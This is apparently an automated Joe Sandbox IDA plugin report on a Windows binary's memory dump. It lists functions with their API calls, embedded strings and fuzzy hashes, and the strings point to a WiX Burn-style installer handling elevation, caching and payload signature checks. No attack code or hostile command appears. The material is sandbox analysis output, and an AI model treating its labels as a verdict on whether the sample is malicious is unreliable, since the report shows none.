Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CompareCreateErrorFileLastString
String ID: Failed to find payload for catalog file.$Failed to get catalog local file path$Failed to open catalog in working path: %ls$Failed to verify catalog signature: %ls$catalog.cpp
API String ID: 1774366664-48089280
Opcode ID: 5001ffb408e7f3c6fc456a0a6fcb19f348c7aeecadcce2640940f92c339b985a
Instruction ID: f4dc2f92c71ed76fbbf46089ee1ab9d0157f3d1c18247b148115b3ce91cbe768
Opcode Fuzzy Hash: 5001ffb408e7f3c6fc456a0a6fcb19f348c7aeecadcce2640940f92c339b985a
Instruction Fuzzy Hash: 2631F872900625BFE7219B54CC4AF5EBBA4EF04720F21816EF94CEB280E771AD509BD0

Function 000ED33E Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 92synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,774D30B0,00000000,?,?,?,?,000ED642,?), ref: 000ED357
ReleaseMutex.KERNEL32(?,?,?,?,000ED642,?), ref: 000ED375
WaitForSingleObject.KERNEL32(?,000000FF), ref: 000ED3B6
ReleaseMutex.KERNEL32(?), ref: 000ED3CD
SetEvent.KERNEL32(?), ref: 000ED3D6

Strings

Failed to send files in use message from netfx chainer., xrefs: 000ED41C
Failed to get message from netfx chainer., xrefs: 000ED3F7

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: MutexObjectReleaseSingleWait$Event
String ID: Failed to get message from netfx chainer.$Failed to send files in use message from netfx chainer.
API String ID: 2608678126-3424578679
Opcode ID: 5043216c3cc2bb3d9bf47fc79b1664be929416991c0265faa40b09a2f1a54146
Instruction ID: df97ca7e5b42ebb63f5c557c2d5fb2e2d40f757553082ace8b449804895bc06b
Opcode Fuzzy Hash: 5043216c3cc2bb3d9bf47fc79b1664be929416991c0265faa40b09a2f1a54146
Instruction Fuzzy Hash: 38312B31900655BFCB129FA5DC48EEEBBF4EF58320F108256F954F22A1C771AA50CB90

Function 0010093B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 92processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 001009AB
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001009B5
CloseHandle.KERNEL32(?,?,?,?,?,00000000,00000000,00000000), ref: 001009FE
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 00100A0B

Strings

D, xrefs: 00100993
procutil.cpp, xrefs: 001009D9
"%ls" %ls, xrefs: 00100974

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CloseHandle$CreateErrorLastProcess
String ID: "%ls" %ls$D$procutil.cpp
API String ID: 161867955-2732225242
Opcode ID: d0d7bab00d50858b52befb4b5a679a0cc21749c558f2acd85cb9fc47b905a646
Instruction ID: 62a09b5470b1ac408beb19c5d5d9a3930f9cb19f79adf99008ee0e50058bcdb2
Opcode Fuzzy Hash: d0d7bab00d50858b52befb4b5a679a0cc21749c558f2acd85cb9fc47b905a646
Instruction Fuzzy Hash: 34216F72D0121EABDB11DFD5CD41AEFBBB8EF04754F100029FA44B7292D7B09E408AA1

Function 000C9B9A Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 75COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 000C9BB3
GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,?,000CA8AB,00000100,000002C0,000002C0,00000100), ref: 000C9BD3
GetLastError.KERNEL32(?,000CA8AB,00000100,000002C0,000002C0,00000100), ref: 000C9BDE

Strings

Failed to set directory search path variable., xrefs: 000C9C0F
Failed to format variable string., xrefs: 000C9BBE
Failed while searching directory search: %ls, for path: %ls, xrefs: 000C9C34
Directory search: %ls, did not find path: %ls, reason: 0x%x, xrefs: 000C9C4A

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Directory search: %ls, did not find path: %ls, reason: 0x%x$Failed to format variable string.$Failed to set directory search path variable.$Failed while searching directory search: %ls, for path: %ls
API String ID: 1811509786-2966038646
Opcode ID: 78078f37261bcd922f4465a5055bc18f886080297f43bfef12e9022a61d22394
Instruction ID: ec37ae1698164b47cdfc35059028a3d47225cd049bc8f5a4cf7c217157443781
Opcode Fuzzy Hash: 78078f37261bcd922f4465a5055bc18f886080297f43bfef12e9022a61d22394
Instruction Fuzzy Hash: 08212B33D40125F7CB2227959E4AF9DBBE8AF10320F214209FD50761A2D7B65E50ABC9

Function 000C9D4B Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 72COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 000C9D64
GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,?,000CA883,00000100,000002C0,000002C0,?,000002C0,00000100), ref: 000C9D84
GetLastError.KERNEL32(?,000CA883,00000100,000002C0,000002C0,?,000002C0,00000100,000002C0,000002C0,00000100), ref: 000C9D8F

Strings

Failed to set variable to file search path., xrefs: 000C9DE7
Failed while searching file search: %ls, for path: %ls, xrefs: 000C9DBD
File search: %ls, did not find path: %ls, xrefs: 000C9DF3
Failed to format variable string., xrefs: 000C9D6F

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Failed to format variable string.$Failed to set variable to file search path.$Failed while searching file search: %ls, for path: %ls$File search: %ls, did not find path: %ls
API String ID: 1811509786-3425311760
Opcode ID: 5313ea87b46ac15ef0f758a09bfdbd830db389a6b742e2367f468fb807efb7d6
Instruction ID: ecf5e2a259b790950456ba1f56baef42055028e97c27a42df0e415b76901788f
Opcode Fuzzy Hash: 5313ea87b46ac15ef0f758a09bfdbd830db389a6b742e2367f468fb807efb7d6
Instruction Fuzzy Hash: 7B112433844125B7DF226B94CD0AF9DBBA5AF10720F20420AFC51B61A1E7B25E20A6D1

Function 000DCF25 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 55synchronizationthreadCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,000DD365,00000000,?,?,000DC7C9,00000001,?,?,?,?,?), ref: 000DCF37
GetLastError.KERNEL32(?,?,000DD365,00000000,?,?,000DC7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 000DCF41
GetExitCodeThread.KERNEL32(00000001,?,?,?,000DD365,00000000,?,?,000DC7C9,00000001,?,?,?,?,?,00000000), ref: 000DCF7D
GetLastError.KERNEL32(?,?,000DD365,00000000,?,?,000DC7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 000DCF87

Strings

Failed to get cache thread exit code., xrefs: 000DCFB5
Failed to wait for cache thread to terminate., xrefs: 000DCF6F
elevation.cpp, xrefs: 000DCF65, 000DCFAB

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$CodeExitObjectSingleThreadWait
String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$elevation.cpp
API String ID: 3686190907-1954264426
Opcode ID: b33017813340ce73cf0ed11d449ee84fe8ddce72b3f50243a1140aac1fc69eb6
Instruction ID: fb8aadca2515a062b90e859cbaeac90920acdfcedb17085b1687423aa14f30bc
Opcode Fuzzy Hash: b33017813340ce73cf0ed11d449ee84fe8ddce72b3f50243a1140aac1fc69eb6
Instruction Fuzzy Hash: 7B014973A8573667E73057858C05EDF7A999F04B61B024136BE44BB380EB918D40C1F4

Function 000D69AE Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 54synchronizationthreadCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000001,000000FF,00000000,?,000D6EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 000D69BB
GetLastError.KERNEL32(?,000D6EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 000D69C5
GetExitCodeThread.KERNEL32(00000001,00000000,?,000D6EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 000D6A04
GetLastError.KERNEL32(?,000D6EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 000D6A0E

Strings

Failed to get cache thread exit code., xrefs: 000D6A3F
Failed to wait for cache thread to terminate., xrefs: 000D69F6
core.cpp, xrefs: 000D69EC, 000D6A35

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$CodeExitObjectSingleThreadWait
String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$core.cpp
API String ID: 3686190907-2546940223
Opcode ID: 6d7ac1ad62b17f251c0717d3b961fc3244938ba07b60853f53679c137b0a081a
Instruction ID: f1c13f4357970fb2c1288e44954ad0ca3d66102235b7476c20fa75b370388b21
Opcode Fuzzy Hash: 6d7ac1ad62b17f251c0717d3b961fc3244938ba07b60853f53679c137b0a081a
Instruction Fuzzy Hash: 6211A570744306FBDB109F659D12BAE76E8EB04710F10417AB944E9290EB73DE409B64

Function 000DF7D9 Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 118COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 000DF7EE
LeaveCriticalSection.KERNEL32(?), ref: 000DF8FB

Strings

Engine is active, cannot change engine state., xrefs: 000DF808
UX requested unknown payload with id: %ls, xrefs: 000DF85A
Failed to set source path for container., xrefs: 000DF8E0
UX requested unknown container with id: %ls, xrefs: 000DF8BA
Failed to set source path for payload., xrefs: 000DF88A
UX denied while trying to set source on embedded payload: %ls, xrefs: 000DF870

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Engine is active, cannot change engine state.$Failed to set source path for container.$Failed to set source path for payload.$UX denied while trying to set source on embedded payload: %ls$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
API String ID: 3168844106-4121889706
Opcode ID: 2b625c9ec77253a9680f97bb5b90705b6b12dc669be6d60431498410e5a6087a
Instruction ID: 658123fc489c621d331b19666c7b4a2fa6bfb21a856ab61694a9f0d57a4aea15
Opcode Fuzzy Hash: 2b625c9ec77253a9680f97bb5b90705b6b12dc669be6d60431498410e5a6087a
Instruction Fuzzy Hash: 3531F632A44756ABCB219B58CC45EBE77A8AF14720B15C037F806EB341DF75ED40A7A2

Function 000C71FD Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 99stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000), ref: 000C7210

Strings

[]{}, xrefs: 000C723A
Failed to append characters., xrefs: 000C729C
Failed to format escape sequence., xrefs: 000C72AA
Failed to allocate buffer for escaped string., xrefs: 000C7227
[\%c], xrefs: 000C726F
Failed to append escape sequence., xrefs: 000C72A3
Failed to copy string., xrefs: 000C72C4

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: lstrlen
String ID: Failed to allocate buffer for escaped string.$Failed to append characters.$Failed to append escape sequence.$Failed to copy string.$Failed to format escape sequence.$[\%c]$[]{}
API String ID: 1659193697-3250950999
Opcode ID: ada51b8442213d6bbe83d81af22d04a085ba03b5ddba47c23e0f6b9eab032274
Instruction ID: 6df139d721108744d3d00eebb1aa57d7800520103ad11a4771f5da1dc2440645
Opcode Fuzzy Hash: ada51b8442213d6bbe83d81af22d04a085ba03b5ddba47c23e0f6b9eab032274
Instruction Fuzzy Hash: 8621F832D0C21ABBDB325790CC42FEE7BAD9F20721F200119F945B61C1DBB59E409AD0

Function 000E5BDC Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 207COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000000,0010B500,000000FF,feclient.dll,000000FF,00000000,00000000,?,?,?,000E67DE,?,00000001,?,0010B4A0), ref: 000E5C45

Strings

feclient.dll, xrefs: 000E5C3B, 000E5D65
Failed to insert execute action., xrefs: 000E5C9A
Failed to copy target product code., xrefs: 000E5D78
Failed to plan action for target product., xrefs: 000E5CF0
Failed grow array of ordered patches., xrefs: 000E5CDE

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CompareString
String ID: Failed grow array of ordered patches.$Failed to copy target product code.$Failed to insert execute action.$Failed to plan action for target product.$feclient.dll
API String ID: 1825529933-3477540455
Opcode ID: c663bbca53c1f36253584c04d6311b398d97333db3bfd08a7813716d4ee82e4c
Instruction ID: dc6464c27fb5e7db5852f05ccb6bf130f909413f6846d665c7f03e70d06b5846
Opcode Fuzzy Hash: c663bbca53c1f36253584c04d6311b398d97333db3bfd08a7813716d4ee82e4c
Instruction Fuzzy Hash: B68146B560478A9FCB54CF59CC90AAA77E5BF08319F218969EC15AB352C730E851CFA0

Function 000FCAED Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,000FD262,00000000,00000000,00000000,00000000,00000000,000F2F1D), ref: 000FCB2F
__fassign.LIBCMT ref: 000FCBAA
__fassign.LIBCMT ref: 000FCBC5
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 000FCBEB
WriteFile.KERNEL32(?,00000000,00000000,000FD262,00000000,?,?,?,?,?,?,?,?,?,000FD262,00000000), ref: 000FCC0A
WriteFile.KERNEL32(?,00000000,00000001,000FD262,00000000,?,?,?,?,?,?,?,?,?,000FD262,00000000), ref: 000FCC43

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: fce3bcced71fdca57a47c5b5a4f8013b4e951e0811895b83f4e16c55fa0d210b
Instruction ID: aca0343427abc68602f57b3e0d97e4dd097d3501576eb7d1d3b4eb3bde63870f
Opcode Fuzzy Hash: fce3bcced71fdca57a47c5b5a4f8013b4e951e0811895b83f4e16c55fa0d210b
Instruction Fuzzy Hash: 4551C271A0024DAFDB14CFA8DD86EEEBBF4EF09300F14411AE655E7691D770A951CBA0

Function 000E9279 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 150COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,00000000,00000100,00000000,?,?,?,000D7113,000000B8,0000001C,00000100), ref: 000E92A4
CompareStringW.KERNEL32(00000000,00000001,?,000000FF,0010B4B8,000000FF,?,?,?,000D7113,000000B8,0000001C,00000100,00000100,00000100,000000B0), ref: 000E932E

Strings

Failed to initialize update bundle., xrefs: 000E93D1
comres.dll, xrefs: 000E93B0
detect.cpp, xrefs: 000E938E
BA aborted detect forward compatible bundle., xrefs: 000E9398

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CompareString
String ID: BA aborted detect forward compatible bundle.$Failed to initialize update bundle.$comres.dll$detect.cpp
API String ID: 1825529933-439563586
Opcode ID: 78ea9f7e6adff0a64dd10cde5df3d43f7337a74979ede97d9f460b717fbd9dc0
Instruction ID: b0870ff00dd7e0a327df3f0d8d3552fcf292657cca81c90a336244fb04ec2d2b
Opcode Fuzzy Hash: 78ea9f7e6adff0a64dd10cde5df3d43f7337a74979ede97d9f460b717fbd9dc0
Instruction Fuzzy Hash: A251C170600341BFDF159F66CC81EAAB7A6FF05310F104269F924AA2A5C771EDA0DBA0

Function 000DAB9E Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 140COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(000C5479,000000FF,00AAC56B,E90010BA,000C53BD,00000000,?,E90010BA,00000000), ref: 000DAC94
GetLastError.KERNEL32(00000000,00000000,00000000,00000000,000C5479,000000FF,00AAC56B,E90010BA,000C53BD,00000000,?,E90010BA,00000000), ref: 000DACD8

Strings

Failed to verify expected payload against actual certificate chain., xrefs: 000DAD1E
Failed authenticode verification of payload: %ls, xrefs: 000DAC75
Failed to get provider state from authenticode certificate., xrefs: 000DACC2
cache.cpp, xrefs: 000DAC6A, 000DACB8, 000DACFC
Failed to get signer chain from authenticode certificate., xrefs: 000DAD06

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast
String ID: Failed authenticode verification of payload: %ls$Failed to get provider state from authenticode certificate.$Failed to get signer chain from authenticode certificate.$Failed to verify expected payload against actual certificate chain.$cache.cpp
API String ID: 1452528299-2590768268
Opcode ID: 35b1d5acf298267d304e1743fd796212c7083d0727151f998691ebed54356864
Instruction ID: db6dc8fb768f7c78685f2f5ac319e43904fe8aa8bc6b7b9399885bfadbadb6a2
Opcode Fuzzy Hash: 35b1d5acf298267d304e1743fd796212c7083d0727151f998691ebed54356864
Instruction Fuzzy Hash: C641A572E11729ABDB119B94CC46BEFBBB8EF05720F01012AF901BB381D77199448AF5

Function 001002F8 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 123COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 0010033C
GetComputerNameW.KERNEL32(?,?), ref: 00100394

Strings

--- logging level: %hs ---, xrefs: 00100454
Executable: %ls v%d.%d.%d.%d, xrefs: 001003F0
Computer : %ls, xrefs: 00100402
=== Logging started: %ls ===, xrefs: 001003BF

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Name$ComputerFileModule
String ID: --- logging level: %hs ---$=== Logging started: %ls ===$Computer : %ls$Executable: %ls v%d.%d.%d.%d
API String ID: 2577110986-3153207428
Opcode ID: aace8a4b71cae3599521f2d2a88e42a19793872c3c78f4e3a9a0da79c67605c9
Instruction ID: 697061b233d4f188f6fb0cf353c2b122f089d80667ecfdbaecdb35d6d7d9f244
Opcode Fuzzy Hash: aace8a4b71cae3599521f2d2a88e42a19793872c3c78f4e3a9a0da79c67605c9
Instruction Fuzzy Hash: 464196B1D00118AFCB219F64DC45BEA77BCEB58300F4041A5F689E3582D7B19ED58F69

Function 000DD437 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 120COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,?,00000001,0010B500,?,00000001,000000FF,?,?,7707B390,00000000,00000001,00000000,?,000D74E6), ref: 000DD560

Strings

Failed to create pipe name and client token., xrefs: 000DD4A1
Failed to connect to elevated child process., xrefs: 000DD549
Failed to create pipe and cache pipe., xrefs: 000DD4BD
elevation.cpp, xrefs: 000DD46B
Failed to elevate., xrefs: 000DD542
UX aborted elevation requirement., xrefs: 000DD475

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CloseHandle
String ID: Failed to connect to elevated child process.$Failed to create pipe and cache pipe.$Failed to create pipe name and client token.$Failed to elevate.$UX aborted elevation requirement.$elevation.cpp
API String ID: 2962429428-3003415917
Opcode ID: 2f9cdd8249fc71d78cd93f575d5fdf24380bc7286678562f372fd0865b1cbaf3
Instruction ID: e8bb52278fda56ac57e25c7e6315c85fbd945ea42ad4bc13aabf52eabedaedce
Opcode Fuzzy Hash: 2f9cdd8249fc71d78cd93f575d5fdf24380bc7286678562f372fd0865b1cbaf3
Instruction Fuzzy Hash: 67310B72648B25BBE7259664DC42FFEB75D9F00724F104217F904A73C2DB61AD4082F5

Function 000DD24B Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 118threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,000DAD40,?,00000000,00000000), ref: 000DD2E9
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 000DD2F5

Part of subcall function 000DCF25: WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,000DD365,00000000,?,?,000DC7C9,00000001,?,?,?,?,?), ref: 000DCF37
Part of subcall function 000DCF25: GetLastError.KERNEL32(?,?,000DD365,00000000,?,?,000DC7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 000DCF41

CloseHandle.KERNEL32(00000000,00000000,?,?,000DC7C9,00000001,?,?,?,?,?,00000000,00000000,?,?,?), ref: 000DD376

Strings

elevation.cpp, xrefs: 000DD319
Failed to create elevated cache thread., xrefs: 000DD323
Failed to pump messages in child process., xrefs: 000DD34D

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$CloseCreateHandleObjectSingleThreadWait
String ID: Failed to create elevated cache thread.$Failed to pump messages in child process.$elevation.cpp
API String ID: 3606931770-4134175193
Opcode ID: 4eb4c37598b88458ab5e8b45a68c2a8e61d6052d57de3c0a9201756d6472ffe5
Instruction ID: e822d5d99d51fc3e36780a4580d2df08cd9efd54149fab9b30442c3d3324a016
Opcode Fuzzy Hash: 4eb4c37598b88458ab5e8b45a68c2a8e61d6052d57de3c0a9201756d6472ffe5
